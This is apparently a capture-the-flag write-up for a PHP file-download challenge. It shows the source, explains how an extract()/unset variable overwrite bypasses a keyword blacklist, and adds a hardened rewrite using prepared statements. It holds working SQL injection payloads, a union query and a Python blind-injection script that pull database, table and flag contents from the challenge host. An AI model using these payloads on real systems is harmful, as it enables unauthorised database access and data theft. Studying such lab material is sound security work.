The web root contains /www.zip, which holds the source code.
index.php
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <title>千毒网盘</title>
</head>
<body>
<div class="container">
    <div class="page-header">
        <h1>
            千毒网盘 <small>提取你的文件</small>
        </h1>
    </div>
    <div class="row clearfix">
        <div class="col-md-4 column">
        </div>
        <div class="col-md-4 column">
            <br>
            <form role="form" action='/index.php' method="POST">
                <div class="form-group">
                    <h3>提取码</h3><br><input class="form-control" name="code" />
                </div>
                <button type="submit" class="btn btn-block btn-default btn-warning">提取文件</button>
            </form>
            <br>
            <?php
            include 'code.php';
            $pan = new Pan();
            // For every key in GET/POST/COOKIE, unset a global variable of the same
            // name when it holds the same value. Because the keys are used as variable
            // names, a request key such as "_POST" can unset the superglobal itself.
            foreach(array('_GET', '_POST', '_COOKIE') as $key)
            {
                if($$key) {
                    foreach($$key as $key_2 => $value_2) {
                        if(isset($$key_2) and $$key_2 == $value_2)
                            unset($$key_2);
                    }
                }
            }
            // The blacklist filter runs only if $_POST['code'] still exists here.
            if(isset($_POST['code'])) $_POST['code'] = $pan->filter($_POST['code']);
            // extract() then recreates any variable that was unset above, unfiltered.
            if($_GET) extract($_GET, EXTR_SKIP);
            if($_POST) extract($_POST, EXTR_SKIP);
            if(isset($_POST['code']))
            {
                $message = $pan->getfile();
                echo <<<EOF
<div class="alert alert-dismissable alert-info">
<button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
<h4>
注意!
</h4> <strong>注意!</strong> {$message}
</div>
EOF;
            }
            ?>
        </div>
        <div class="col-md-4 column">
        </div>
    </div>
</div>
</div>
</body>
</html>
code.php
<?php
class Pan
{
    public $hostname = '127.0.0.1';
    public $username = 'root';
    public $password = 'root';
    public $database = 'ctf';
    private $mysqli = null;

    public function __construct()
    {
        $this->mysqli = mysqli_connect(
            $this->hostname,
            $this->username,
            $this->password
        );
        mysqli_select_db($this->mysqli,$this->database);
    }

    // Keyword blacklist: returns False if any listed token or a single quote appears.
    public function filter($string)
    {
        $safe = preg_match('/union|select|flag|in|or|on|where|like|\'/is', $string);
        if($safe === 0){
            return $string;
        }else{
            return False;
        }
    }

    public function getfile()
    {
        $code = $_POST['code'];
        if($code === False) return '非法提取码!';
        $file_code = array(114514,233333,666666);
        // in_array() without the third argument uses loose (==) comparison.
        if(in_array($code,$file_code))
        {
            // $code is interpolated straight into the query.
            $sql = "select * from file where code='$code'";
            $result = mysqli_query($this->mysqli,$sql);
            $result = mysqli_fetch_object($result);
            return '下载直链为:'.$result->url;
        }else{
            return '提取码不存在!';
        }
    }
}
Reference: https://daolgts.github.io/2018/09/05/unset-%E8%AE%B0%E4%B8%80%E9%81%93CTF%E9%A2%98/

Constructing the payload

GET
http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]=114514'/**/and/**/1=1#

POST
code=114514'/**/and/**/1=1#

The same value is sent in both places, and the response differs between:
and 1=1
and 1=2
A union query yields the flag directly. The point to note is that you cannot get output by building a condition whose first half is false and second half true, because as soon as the first part fails the if branch returns 提取码不存在! (extraction code does not exist). Also, in_array() here is called without its third argument set to true, so loose type comparison is in play, but that has little effect. You can only build conditions like the one above: with union select both halves are true and two rows come back; to get the second row, just append limit 1,1.
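For the defensive side, here is a hardened rewrite of Pan::getfile() that closes the three weaknesses the solution chains together (the extract() variable overwrite that skips the filter, the loose in_array() comparison, and string interpolation into SQL). This is an added example, not the challenge author's code; it assumes a mysqli connection is injected and that mysqlnd is available for get_result().

```php
<?php
// Hardened replacement for Pan::getfile() and Pan::filter() from code.php.
// Added example, not the challenge author's code. No extract() over request
// arrays, so a GET parameter named _POST cannot swap in an unfiltered value;
// strict validation instead of a keyword blacklist and loose in_array(); and
// a prepared statement instead of interpolating the value into SQL.
class SafePan
{
    private mysqli $mysqli;

    public function __construct(mysqli $mysqli)
    {
        $this->mysqli = $mysqli;
    }

    public function getfile(array $post): string
    {
        // Take the raw POST array as an argument; nothing is extract()ed.
        $code = $post['code'] ?? null;

        // An extraction code is a plain decimal string and nothing else. This
        // replaces the blacklist in filter(): there is no keyword to bypass.
        if (!is_string($code) || !ctype_digit($code)) {
            return '非法提取码!';
        }

        // Cast first, then compare strictly, so "114514' and 1=1#" can never
        // match 114514 the way in_array() without its third argument allows.
        $code_int = (int)$code;
        $file_code = array(114514, 233333, 666666);
        if (!in_array($code_int, $file_code, true)) {
            return '提取码不存在!';
        }

        // Bound parameter: the value travels separately from the query text.
        $stmt = $this->mysqli->prepare('SELECT url FROM file WHERE code = ?');
        if ($stmt === false) {
            return '提取码不存在!';
        }
        $stmt->bind_param('i', $code_int);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_object();
        $stmt->close();

        return $row ? '下载直链为:' . $row->url : '提取码不存在!';
    }
}
```

In index.php this would be called as `$pan->getfile($_POST)` with the unset loop and the two extract() calls removed, since the rewrite no longer depends on global variable state.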
payload
7777777' union select 1,2 limit 1,1#

From there it is a normal injection process, which I will not demonstrate step by step; just query the flag directly.

During the competition I foolishly solved it with blind injection...... Here is the blind injection solution.

Blind injection script
import requests,string
from urllib.parse import quote

# Candidate characters for each position of the extracted value.
ascii_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
url = 'http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]='
post_header = {'Host': 'eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
               'Accept-Encoding': 'gzip, deflate',
               'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
               'Content-Type': 'application/x-www-form-urlencoded'}

for i in range(1,100):
    for j in ascii_str:
        payload = "114514'/**/and/**/ord(mid(database(),{0},1))={1}#".format(i,ord(j))
        # The same value goes in the GET _POST[code] parameter and the POST body,
        # which is what makes the unset loop in index.php drop $_POST.
        post_content = {'code':payload}
        res_url = url+quote(payload)
        res = requests.post(url=res_url,headers=post_header,data=post_content)
        # A true condition returns the download link, which contains "png".
        if 'png' in res.text:
            print(j,end="")
payloads used for each stage
114514'/**/and/**/ord(mid(database(),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/flag/**/from/**/ctf.flag),{0},1))={1}#
Query results
Databases: ctf
[ctf]Tables: file,flag
[flag]columns: flag